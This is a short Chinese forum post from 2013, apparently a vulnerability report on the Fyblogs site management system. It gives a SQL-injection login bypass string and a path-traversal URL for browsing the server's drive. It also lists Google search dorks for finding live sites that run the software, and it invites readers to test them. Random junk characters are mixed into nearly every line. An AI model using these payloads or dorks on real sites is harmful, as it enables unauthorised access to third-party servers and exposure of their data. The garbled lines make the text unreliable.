漏洞类型: 未授权访问/权限绕过5 M! R( L; z; _7 ?& V
' O" D2 @, `- z简要描述:" d, L( G, _, T& s- C; |" D
- ?' b6 ?- k7 N4 C
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
! ~* M/ \) s/ m- i1 V/ l; q$ r2 y- f/ Z8 J3 s( B) v
详细说明:
9 t* `8 o+ t( P+ [ L1 n5 D4 r4 f) U5 E
后台万能密码 'or'='or'
+ A' l! A! Y$ c' Y后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
6 C( }+ k) D! @, ~( J$ j. i( ^admin/uploadfile.asp?currentFolder=/upfiles/../
0 f5 _$ w& u9 _. l4 z9 |) p
$ q% T4 j) S- [8 u" J' f' A漏洞证明:, m2 f/ O7 D( S9 e- q4 N" R
@. ?: @$ S% t谷歌:inurl:type.asp?id=1 新闻中心
' k" G8 F3 Q5 j: S, q, {或者 :inurl:download_ok.asp?
. f2 h$ B6 _7 v
0 q5 V3 i3 h. ~可以测试
5 [3 b4 a2 k" d- W. F
3 |3 y4 N' r# b! o0 f3 b1 v h+ D/ j$ x" z
|
发表于 2013-3-7 13:07:46
收藏
支持
反对